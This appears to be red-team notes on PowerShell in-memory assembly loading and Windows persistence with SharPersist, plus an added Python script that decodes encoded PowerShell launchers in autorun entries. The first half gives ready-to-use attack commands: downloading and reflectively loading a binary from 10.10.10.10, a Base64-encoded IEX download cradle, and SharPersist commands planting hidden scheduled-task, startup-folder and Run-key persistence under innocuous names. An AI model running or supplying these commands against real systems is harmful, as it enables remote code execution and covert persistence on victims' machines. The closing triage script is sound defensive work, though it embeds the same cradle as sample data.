```powershell
[system.reflection.assembly]::LoadFile("file")
[namespace.class]::Main()
```
Binary reflective loading
```powershell
$data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/binary.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[binary.Program]::Main("".Split())
```
Persistence
-Task Scheduler
Using SharPersist
```powershell
$str = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/payload.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))
```
The snippet above produces a Base64 string of the UTF-16LE bytes of the command (the encoding powershell.exe -enc expects); that string is supplied in the snippet below:
```powershell
.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64 ENCODED STRING HERE" -n "Updater" -m add -o hourly
```
-t -> the desired persistence technique.
-c -> command to execute.
-a -> any arguments for that command.
-n -> the name of the task.
-m -> to add the task (you can also remove, check and list).
-o -> the task frequency.
-Startup Folder
```powershell
.\SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc BASE64_HERE" -f "UserEnvSetup" -m add
```
-f -> the filename to save as.
-Registry AutoRun
```powershell
.\SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add
```
Output:
```text
[*] INFO: Adding registry persistence
[*] INFO: Command: C:\ProgramData\Updater.exe
[*] INFO: Command Args: /q /n
[*] INFO: Registry Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
[*] INFO: Registry Value: Updater
[*] INFO: Option:
[+] SUCCESS: Registry persistence added
```
-k -> the registry key to modify (hkcurun is the HKCU ...\CurrentVersion\Run key shown in the output).
-v -> the name of the registry value to create under that key (Updater in the output above).
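From the defender's side, the three persistence locations above (scheduled task action, startup folder script, Run value) all end up holding a powershell.exe command line with an -enc argument. The following Python triage helper is an added example, not part of the original notes or of SharPersist: it locates the -enc argument in a stored command line, reverses the UTF-16LE Base64 encoding shown earlier, and flags decoded scripts that contain a download cradle. The sample autorun entries are constructed; the paths and payload URL mirror the ones used on this page, and the function and constant names are my own.

```python
import base64
import re

# powershell.exe -enc takes Base64 of the UTF-16LE bytes of the script, which is what
# the ToBase64String/Unicode.GetBytes snippet produces. The switch may be abbreviated
# (-e, -ec, -enc, -EncodedCommand); -ep/-exec (ExecutionPolicy) are deliberately excluded.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
# Substrings that indicate a download cradle in the decoded script.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloaddata", "net.webclient")

def encode_for_powershell(script: str) -> str:
    """Same transformation as the page's .NET snippet; used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline: str):
    """Return the decoded -enc payload found in cmdline, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")  # an odd byte count raises here
    except (ValueError, UnicodeDecodeError):
        return None  # looked like -enc but is not a valid blob

def triage(entries):
    """entries: list of (source, command line). One finding per encoded launcher."""
    findings = []
    for source, cmdline in entries:
        decoded = decode_encoded_command(cmdline)
        if decoded is None:
            continue
        hits = [k for k in CRADLE_MARKERS if k in decoded.lower()]
        findings.append({"source": source, "decoded": decoded, "cradle": bool(hits)})
    return findings

# Constructed sample entries modelled on the Run value and scheduled task above.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = 'IEX ((new-object net.webclient).downloadstring("http://10.10.10.10/payload.ps1"))'
SAMPLE_AUTORUNS = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     PS + " -nop -w hidden -enc " + encode_for_powershell(CRADLE)),
    ("schtasks:UserEnvSetup", PS + " -nop -enc " + encode_for_powershell("Get-Date")),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_AUTORUNS):
        print(("CRADLE " if f["cradle"] else "encoded") + f" {f['source']}: {f['decoded']}")
```

On a live host the entries would come from the Run key values, the startup folder scripts and Get-ScheduledTask actions rather than the constructed list.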